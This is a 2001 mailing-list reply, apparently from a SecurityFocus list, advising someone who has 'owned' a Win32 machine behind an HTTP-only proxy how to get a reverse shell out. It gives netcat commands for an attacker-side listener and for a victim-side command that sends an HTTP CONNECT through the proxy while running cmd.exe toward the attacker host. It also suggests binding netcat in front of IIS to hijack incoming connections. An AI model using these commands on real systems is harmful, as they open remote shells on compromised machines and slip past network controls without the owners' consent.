Re: Reverse Http Shell Solution

From: Jody Melbourne (jody.melbourneat_private)
Date: Thu Oct 18 2001 - 19:30:36 PDT

    Hi,

    > Does anybody know any solution based on the remote shell in Win32
    > machines using Reverse Telnet thru Proxies?
    > The proxy only permits HTTP 80/8080.

    I think your situation is this: You have owned a machine which is behind a
    firewall, and it only allows connections out via a proxy, so simple reverse
    telnet techniques such as 'nc.exe -e cmd.exe myip myport' fail.

    You could try something like this:

    Attacker: netcat -v -l -p 80

    Victim: echo CONNECT attacker:80 HTTP/1.1 | netcat proxyserver 8080 -e
    cmd.exe

    The HTTP/1.1 CONNECT method is the only way I can see you getting a nice
    interactive command prompt if ports 80/8080 outbound are all you have to
    play with. Remember that netcat can bind in FRONT of the existing IIS
    process. If you spawn as netcat listener on 80, 443, 21, etc.. with the '-l'
    (listen once) option, the next person to connect to that port will get the
    netcat listener. Any subsequent connections will see the IIS service.

    cheers

    .jm

    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/